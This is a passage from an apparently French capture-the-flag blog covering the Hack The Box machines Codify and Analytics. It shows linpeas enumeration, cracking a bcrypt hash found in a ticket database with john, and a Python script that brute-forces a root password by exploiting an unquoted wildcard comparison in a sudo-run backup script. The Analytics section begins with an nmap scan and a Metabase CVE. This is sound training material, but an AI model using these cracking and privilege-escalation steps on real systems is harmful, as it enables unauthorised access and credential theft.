linpeas.sh </span></span><span class="line"><span class="cl"> % Total % Received % Xferd Average Speed Time Time Time Current </span></span><span class="line"><span class="cl"> Dload Upload Total Spent Left Speed </span></span><span class="line"><span class="cl"><span class="m">100</span> 828k <span class="m">100</span> 828k <span class="m">0</span> <span class="m">0</span> 5875k <span class="m">0</span> --:--:-- --:--:-- --:--:-- 5914k </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## On met le resultat de linpeas dans un fichier</span> </span></span><span class="line"><span class="cl">$ ./linpeas.sh &gt; linpeas_result.txt <span class="p">&amp;</span> </span></span><span class="line"><span class="cl"><span class="c1">## On fait un grep pour voir les fichiers .db</span> </span></span><span class="line"><span class="cl">$ cat linpeas_result.txt <span class="p">|</span> grep <span class="s2">&#34;.db&#34;</span> </span></span><span class="line"><span class="cl">Found /var/lib/plocate/plocate.db: regular file, no <span class="nb">read</span> permission </span></span><span class="line"><span class="cl">Found /var/www/contact/tickets.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 17, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for <span class="m">17</span> </span></span><span class="line"><span class="cl"> -&gt; Extracting tables from /var/lib/command-not-found/commands.db <span class="o">(</span>limit 20<span class="o">)</span> </span></span><span class="line"><span class="cl"> -&gt; Extracting tables from /var/lib/fwupd/pending.db <span class="o">(</span>limit 20<span class="o">)</span> </span></span><span class="line"><span class="cl"> -&gt; Extracting tables from /var/lib/PackageKit/transactions.db <span class="o">(</span>limit 20<span class="o">)</span> </span></span><span class="line"><span class="cl"> -&gt; Extracting tables from /var/www/contact/tickets.db <span class="o">(</span>limit 20<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## On remarque le fichier tickets.db qui semble intéressant</span> </span></span><span class="line"><span class="cl">svc@codify:~$ cat /var/www/contact/tickets.db </span></span><span class="line"><span class="cl">�T5��T�format 3@ .WJ </span></span><span class="line"><span class="cl"> otableticketsticketsCREATE TABLE tickets <span class="o">(</span>id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, topic TEXT, description TEXT, status TEXT<span class="o">)</span>P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence<span class="o">(</span>name,seq<span class="o">)</span>�� tableusersusersCREATE TABLE users <span class="o">(</span> </span></span><span class="line"><span class="cl"> id INTEGER PRIMARY KEY AUTOINCREMENT, </span></span><span class="line"><span class="cl"> username TEXT UNIQUE, </span></span><span class="line"><span class="cl"> password TEXT </span></span><span class="line"><span class="cl">��G�joshua<span class="nv">$2</span>a<span class="nv">$12$SOn8Pf6z8fO</span>/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2 </span></span><span class="line"><span class="cl">�� </span></span><span class="line"><span class="cl">����ua users </span></span><span class="line"><span class="cl"> ickets </span></span><span class="line"><span class="cl">r<span class="o">]</span>r�h%%�Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to <span class="nb">set</span> this up locally? Like instead of coming to this site, can I download this and <span class="nb">set</span> it up in my own computer? A feature like that would be nice.open� <span class="p">;</span>�wTom HanksNeed networking modulesI think it would be better <span class="k">if</span> you can implement a way to handle network-based stuff. Would <span class="nb">help</span> me out a lot. Thanks!opensvc@codify:~$ 2024-01-10 17:23:17 TLS Error: local/remote TLS keys are out of sync: <span class="o">[</span>AF_INET<span class="o">]</span>23.106.35.214:1337 <span class="o">[</span>7<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><p>Dans ce fichier il y a le hash de l&rsquo;utilisateur joshua</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">joshua<span class="nv">$2</span>a<span class="nv">$12$SOn8Pf6z8fO</span>/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2 </span></span></code></pre></td></tr></table> </div> </div><h3 id="second-way-to-find-ticketsdb">Second way to find tickets.db </h3><p>A l&rsquo;aide de grep, on peut rechercher tous les fichiers qui contiennent une certaine chaine de caractères. On aurait pu par exemple, faire une recherche récursive de &ldquo;joshua&rdquo; dans tous les fichiers du système cible. On aurait alors trouver facilement le fichier tickets.db.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">svc@codify:~$ grep -rl <span class="s2">&#34;joshua&#34;</span> / 2&gt; /dev/null </span></span><span class="line"><span class="cl">/run/systemd/transient/session-c1.scope </span></span><span class="line"><span class="cl">/run/systemd/users/1000 </span></span><span class="line"><span class="cl">/run/systemd/sessions/c1 </span></span><span class="line"><span class="cl">/var/cache/apt/srcpkgcache.bin </span></span><span class="line"><span class="cl">/var/cache/apt/pkgcache.bin </span></span><span class="line"><span class="cl">/var/www/contact/tickets.db <span class="c1"># ICI</span> </span></span><span class="line"><span class="cl">/var/lib/apt/lists/lk.archive.ubuntu.com_ubuntu_dists_jammy_universe_binary-amd64_Packages </span></span><span class="line"><span class="cl">/var/lib/apt/lists/lk.archive.ubuntu.com_ubuntu_dists_jammy_universe_i18n_Translation-en </span></span><span class="line"><span class="cl">/var/log/wtmp </span></span><span class="line"><span class="cl">/var/log/journal/08b7d40fcb5444a9baa8b47d27502d2d/user-1001.journal </span></span></code></pre></td></tr></table> </div> </div><h3 id="cracking-joshua-hash--john">Cracking joshua hash | john </h3><p>A l&rsquo;aide de <strong>john</strong>, on tente de cracker le hash du mot de passe de <strong>joshua</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ john --wordlist<span class="o">=</span>~/wordlists/rockyou.txt joshua_hash.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Loaded <span class="m">1</span> password <span class="nb">hash</span> <span class="o">(</span>bcrypt <span class="o">[</span>Blowfish 32/64 X2<span class="o">])</span> </span></span><span class="line"><span class="cl">Will run <span class="m">8</span> OpenMP threads </span></span><span class="line"><span class="cl">Press <span class="s1">&#39;q&#39;</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">spongebob1 <span class="o">(</span>?<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">1g 0:00:00:38 100% 0.02606g/s 36.27p/s 36.27c/s 36.27C/s teacher..atlanta </span></span><span class="line"><span class="cl">Use the <span class="s2">&#34;--show&#34;</span> option to display all of the cracked passwords reliably </span></span><span class="line"><span class="cl">Session completed </span></span></code></pre></td></tr></table> </div> </div><p>Le mot de passe de l&rsquo;utilisateur <strong>joshua</strong> est donc <strong>spongebob1</strong>.</p> <h3 id="user-flag-ssh-joshua">User flag: SSH joshua </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh joshua@10.10.11.239 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The authenticity of host <span class="s1">&#39;10.10.11.239 (10.10.11.239)&#39;</span> can<span class="s1">&#39;t be established. </span></span></span><span class="line"><span class="cl"><span class="s1">ED25519 key fingerprint is SHA256:Q8HdGZ3q/X62r8EukPF0ARSaCd+8gEhEJ10xotOsBBE. </span></span></span><span class="line"><span class="cl"><span class="s1">This key is not known by any other names </span></span></span><span class="line"><span class="cl"><span class="s1">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes </span></span></span><span class="line"><span class="cl"><span class="s1">Warning: Permanently added &#39;</span>10.10.11.239<span class="s1">&#39; (ED25519) to the list of known hosts. </span></span></span><span class="line"><span class="cl"><span class="s1">joshua@10.10.11.239&#39;</span>s password: ******* </span></span><span class="line"><span class="cl">Welcome to Ubuntu 22.04.3 LTS <span class="o">(</span>GNU/Linux 5.15.0-88-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Last login: Wed Jan <span class="m">10</span> 16:35:11 <span class="m">2024</span> from 10.10.14.159 </span></span><span class="line"><span class="cl">joshua@codify:~$ whoami </span></span><span class="line"><span class="cl">joshua </span></span><span class="line"><span class="cl">joshua@codify:~$ ls </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">joshua@codify:~$ cat user.txt </span></span><span class="line"><span class="cl">3c02.....ef98 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="mysql-backupsh-as-root">mysql-backup.sh as root </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">joshua@codify:~$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> joshua on codify: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin, use_pty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User joshua may run the following commands on codify: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> /opt/scripts/mysql-backup.sh </span></span></code></pre></td></tr></table> </div> </div><p>On remarque qu&rsquo;on a le droit d&rsquo;executer la commande <strong>/opt/scripts/mysql-backup.sh</strong> en tant que <strong>root</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ cat /opt/scripts/mysql-backup.sh </span></span><span class="line"><span class="cl"><span class="c1">##!/bin/bash</span> </span></span><span class="line"><span class="cl"><span class="nv">DB_USER</span><span class="o">=</span><span class="s2">&#34;root&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">DB_PASS</span><span class="o">=</span><span class="k">$(</span>/usr/bin/cat /root/.creds<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="nv">BACKUP_DIR</span><span class="o">=</span><span class="s2">&#34;/var/backups/mysql&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">read</span> -s -p <span class="s2">&#34;Enter MySQL password for </span><span class="nv">$DB_USER</span><span class="s2">: &#34;</span> USER_PASS </span></span><span class="line"><span class="cl">/usr/bin/echo </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">[[</span> <span class="nv">$DB_PASS</span> <span class="o">==</span> <span class="nv">$USER_PASS</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;Password confirmed!&#34;</span> </span></span><span class="line"><span class="cl"><span class="k">else</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;Password confirmation failed!&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">exit</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">/usr/bin/mkdir -p <span class="s2">&#34;</span><span class="nv">$BACKUP_DIR</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">databases</span><span class="o">=</span><span class="k">$(</span>/usr/bin/mysql -u <span class="s2">&#34;</span><span class="nv">$DB_USER</span><span class="s2">&#34;</span> -h 0.0.0.0 -P <span class="m">3306</span> -p<span class="s2">&#34;</span><span class="nv">$DB_PASS</span><span class="s2">&#34;</span> -e <span class="s2">&#34;SHOW DATABASES;&#34;</span> <span class="p">|</span> /usr/bin/grep -Ev <span class="s2">&#34;(Database|information_schema|performance_schema)&#34;</span><span class="k">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> db in <span class="nv">$databases</span><span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;Backing up database: </span><span class="nv">$db</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> /usr/bin/mysqldump --force -u <span class="s2">&#34;</span><span class="nv">$DB_USER</span><span class="s2">&#34;</span> -h 0.0.0.0 -P <span class="m">3306</span> -p<span class="s2">&#34;</span><span class="nv">$DB_PASS</span><span class="s2">&#34;</span> <span class="s2">&#34;</span><span class="nv">$db</span><span class="s2">&#34;</span> <span class="p">|</span> /usr/bin/gzip &gt; <span class="s2">&#34;</span><span class="nv">$BACKUP_DIR</span><span class="s2">/</span><span class="nv">$db</span><span class="s2">.sql.gz&#34;</span> </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">/usr/bin/echo <span class="s2">&#34;All databases backed up successfully!&#34;</span> </span></span><span class="line"><span class="cl">/usr/bin/echo <span class="s2">&#34;Changing the permissions&#34;</span> </span></span><span class="line"><span class="cl">/usr/bin/chown root:sys-adm <span class="s2">&#34;</span><span class="nv">$BACKUP_DIR</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl">/usr/bin/chmod <span class="m">774</span> -R <span class="s2">&#34;</span><span class="nv">$BACKUP_DIR</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl">/usr/bin/echo <span class="s1">&#39;Done!&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><p>On remarque un problème dans le <strong>if</strong>. Il n&rsquo;y a pas de guillement sur les variables. Ca va nous permettre de bruteforce le mot de passe car les wildcard seront executé</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="k">if</span> <span class="o">[[</span> <span class="nv">$DB_PASS</span> <span class="o">==</span> <span class="nv">$USER_PASS</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;Password confirmed!&#34;</span> </span></span><span class="line"><span class="cl"><span class="k">else</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;Password confirmation failed!&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">exit</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">subprocess</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">execute_command</span><span class="p">(</span><span class="n">command</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">command</span> <span class="o">=</span> <span class="sa">f</span><span class="s1">&#39;echo &#34;</span><span class="si">{</span><span class="n">password</span><span class="si">}</span><span class="s1">*&#34; | </span><span class="si">{</span><span class="n">command</span><span class="si">}</span><span class="s1">&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">(</span><span class="n">command</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stderr</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">result</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">brute_force_password</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">command</span> <span class="o">=</span> <span class="s2">&#34;/opt/scripts/mysql-backup.sh&#34;</span> </span></span><span class="line"><span class="cl"> <span class="n">charset</span> <span class="o">=</span> <span class="s1">&#39;abcdefghijklmnopqrstuvwxyz123456789&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">password_length</span> <span class="o">=</span> <span class="mi">21</span> </span></span><span class="line"><span class="cl"> <span class="n">password</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">password_length</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">charset</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">password</span> <span class="o">+</span> <span class="n">c</span> </span></span><span class="line"><span class="cl"> <span class="n">output</span> <span class="o">=</span> <span class="n">execute_command</span><span class="p">(</span><span class="n">command</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="s2">&#34;Password confirmed!&#34;</span> <span class="ow">in</span> <span class="n">output</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;Letter found: </span><span class="si">{</span><span class="n">p</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">password</span> <span class="o">+=</span> <span class="n">c</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">brute_force_password</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">bruteforce.py user.txt </span></span><span class="line"><span class="cl">joshua@codify:~$ python3 bruteforce.py </span></span><span class="line"><span class="cl">Letter found: k </span></span><span class="line"><span class="cl">Letter found: kl </span></span><span class="line"><span class="cl">Letter found: klj </span></span><span class="line"><span class="cl">Letter found: kljh </span></span><span class="line"><span class="cl">Letter found: kljh1 </span></span><span class="line"><span class="cl">Letter found: kljh12 </span></span><span class="line"><span class="cl">Letter found: kljh12k </span></span><span class="line"><span class="cl">Letter found: kljh12k3 </span></span><span class="line"><span class="cl">Letter found: kljh12k3j </span></span><span class="line"><span class="cl">Letter found: kljh12k3jh </span></span><span class="line"><span class="cl">Letter found: kljh12k3jha </span></span><span class="line"><span class="cl">Letter found: kljh12k3jhas </span></span><span class="line"><span class="cl">Letter found: kljh12k3jhask </span></span><span class="line"><span class="cl">Letter found: kljh12k3jhaskj </span></span><span class="line"><span class="cl">Letter found: kljh12k3jhaskjh </span></span><span class="line"><span class="cl">Letter found: kljh12k3jhaskjh1 </span></span><span class="line"><span class="cl">Letter found: kljh12k3jhaskjh12 </span></span><span class="line"><span class="cl">Letter found: kljh12k3jhaskjh12k </span></span><span class="line"><span class="cl">Letter found: kljh12k3jhaskjh12kj </span></span><span class="line"><span class="cl">Letter found: kljh12k3jhaskjh12kjh </span></span><span class="line"><span class="cl">Letter found: kljh12k3jhaskjh12kjh3 </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">joshua@codify:~$ su root </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">root@codify:/home/joshua# <span class="nb">cd</span> </span></span><span class="line"><span class="cl">root@codify:~# cat root.txt </span></span><span class="line"><span class="cl">4029.....7333 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/analytics-htb/Sat, 30 Dec 2023 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/analytics-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Analytics cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Analytics</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.233</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -p- 10.10.11.233 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 3eea454bc5d16d6fe2d4d13b0a3da94f <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ <span class="m">256</span> 64cc75de4ae6a5b473eb3f1bcfb4e394 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl">80/tcp open http nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://analytical.htb/ </span></span><span class="line"><span class="cl">Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="etchosts">/etc/hosts </h3><p>On ajoute les noms de domaines necessaire. Un peu plus tard on découvrira qu&rsquo;il y a également le nom de domaine: <strong>data.analytical.htb</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## ...</span> </span></span><span class="line"><span class="cl">10.10.11.233 analytical.htb </span></span><span class="line"><span class="cl">10.10.11.233 data.analytical.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="metabase-cve">Metabase CVE </h3><p>La machine semble utiliser metabase. En recherchant sur internet: metabase CVE.</p> <p>On trouve tout de suite une vulnérabilité de 2023 exploitable assez facilemement pour la version de metabase installée.<br> J&rsquo;ai cloné un repo github avec la Proof of concert (PoC) ainsi qu&rsquo;un autre script pour exploiter la vulnérabilité et ouvrir un shell.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td 